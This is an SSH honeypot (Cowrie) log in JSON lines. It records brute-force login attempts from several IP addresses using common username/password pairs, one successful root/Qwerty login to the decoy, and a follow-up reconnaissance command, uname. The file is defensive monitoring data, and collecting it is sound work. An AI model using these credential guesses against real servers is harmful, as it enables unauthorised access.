{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:46:16.814080Z","src_ip":"212.227.235.229","session":"42cca19f8bc5"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"12345678","message":"login attempt [ftptest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:22.763589Z","src_ip":"212.227.235.229","session":"42cca19f8bc5"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:24.553711Z","src_ip":"212.227.235.229","session":"42cca19f8bc5"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33338,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e219fc16da3","protocol":"ssh","message":"New connection: 41.226.27.251:33338 (1.2.3.4:22) [session: 3e219fc16da3]","sensor":"my-vps","timestamp":"2025-08-31T02:46:25.396675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:25.400984Z","src_ip":"41.226.27.251","session":"3e219fc16da3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:46:25.442069Z","src_ip":"41.226.27.251","session":"3e219fc16da3"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:25.620248Z","src_ip":"41.226.27.251","session":"3e219fc16da3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:26.878954Z","src_ip":"41.226.27.251","session":"3e219fc16da3"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:29.717536Z","src_ip":"212.227.235.229","session":"fe9125122295"}
{"eventid":"cowrie.session.closed","duration":"91.8","message":"Connection lost after 91.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:36.082628Z","src_ip":"212.227.235.229","session":"fe9125122295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40222,"dst_ip":"1.2.3.4","dst_port":22,"session":"3abd0b3cf215","protocol":"ssh","message":"New connection: 212.227.125.160:40222 (1.2.3.4:22) [session: 3abd0b3cf215]","sensor":"my-vps","timestamp":"2025-08-31T02:46:37.292851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:37.854250Z","src_ip":"212.227.125.160","session":"3abd0b3cf215"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:46:37.854973Z","src_ip":"212.227.125.160","session":"3abd0b3cf215"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"12345678","message":"login attempt [ftptest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:40.329534Z","src_ip":"212.227.125.160","session":"3abd0b3cf215"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:42.001390Z","src_ip":"212.227.125.160","session":"3abd0b3cf215"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:42.700448Z","src_ip":"212.227.235.229","session":"8eb1702cb937"}
{"eventid":"cowrie.session.closed","duration":180.21858143806458,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:42.705068Z","src_ip":"212.227.235.229","session":"8eb1702cb937"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49980,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4990d3ca7aa","protocol":"ssh","message":"New connection: 212.227.235.229:49980 (1.2.3.4:22) [session: a4990d3ca7aa]","sensor":"my-vps","timestamp":"2025-08-31T02:46:43.463640Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44402,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b76ccd6e0b","protocol":"ssh","message":"New connection: 41.226.27.251:44402 (1.2.3.4:22) [session: 95b76ccd6e0b]","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.570522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.614073Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.634381Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.800357Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:46:45.922811Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.923606Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.967618Z","src_ip":"212.227.235.229","session":"a4990d3ca7aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.968702Z","src_ip":"212.227.235.229","session":"a4990d3ca7aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.970944Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:45.972221Z","src_ip":"41.226.27.251","session":"95b76ccd6e0b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:52.883554Z","src_ip":"212.227.235.229","session":"a4990d3ca7aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63246,"dst_ip":"1.2.3.4","dst_port":22,"session":"be68d0ec9442","protocol":"ssh","message":"New connection: 212.227.125.160:63246 (1.2.3.4:22) [session: be68d0ec9442]","sensor":"my-vps","timestamp":"2025-08-31T02:46:58.028806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:46:58.029800Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:46:58.113230Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer","message":"login attempt [sawyer/sawyer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:58.529830Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1","message":"login attempt [sawyer/sawyer1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:59.616685Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.session.closed","duration":"16.4","message":"Connection lost after 16.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:59.873915Z","src_ip":"212.227.235.229","session":"a4990d3ca7aa"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer123","message":"login attempt [sawyer/sawyer123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:00.702629Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1234","message":"login attempt [sawyer/sawyer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:01.789253Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer12345","message":"login attempt [sawyer/sawyer12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:02.875337Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:03.967774Z","src_ip":"212.227.125.160","session":"be68d0ec9442"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39424,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec0371a78e2","protocol":"ssh","message":"New connection: 41.226.27.251:39424 (1.2.3.4:22) [session: 1ec0371a78e2]","sensor":"my-vps","timestamp":"2025-08-31T02:47:05.977630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:05.978628Z","src_ip":"41.226.27.251","session":"1ec0371a78e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:06.022540Z","src_ip":"41.226.27.251","session":"1ec0371a78e2"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:06.153788Z","src_ip":"41.226.27.251","session":"1ec0371a78e2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:07.332461Z","src_ip":"41.226.27.251","session":"1ec0371a78e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58908,"dst_ip":"1.2.3.4","dst_port":22,"session":"74c84b633a93","protocol":"ssh","message":"New connection: 212.227.235.229:58908 (1.2.3.4:22) [session: 74c84b633a93]","sensor":"my-vps","timestamp":"2025-08-31T02:47:15.558051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:16.328074Z","src_ip":"212.227.235.229","session":"74c84b633a93"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:47:16.330117Z","src_ip":"212.227.235.229","session":"74c84b633a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50346,"dst_ip":"1.2.3.4","dst_port":22,"session":"49cb3d959172","protocol":"ssh","message":"New connection: 212.227.125.160:50346 (1.2.3.4:22) [session: 49cb3d959172]","sensor":"my-vps","timestamp":"2025-08-31T02:47:16.713567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:18.628655Z","src_ip":"212.227.125.160","session":"49cb3d959172"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:18.629335Z","src_ip":"212.227.125.160","session":"49cb3d959172"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"123456789","message":"login attempt [ftptest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:22.345366Z","src_ip":"212.227.235.229","session":"74c84b633a93"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:24.132215Z","src_ip":"212.227.235.229","session":"74c84b633a93"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:24.312268Z","src_ip":"212.227.125.160","session":"49cb3d959172"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60652,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5b277e420c","protocol":"ssh","message":"New connection: 41.226.27.251:60652 (1.2.3.4:22) [session: ba5b277e420c]","sensor":"my-vps","timestamp":"2025-08-31T02:47:26.040250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:26.070804Z","src_ip":"41.226.27.251","session":"ba5b277e420c"}
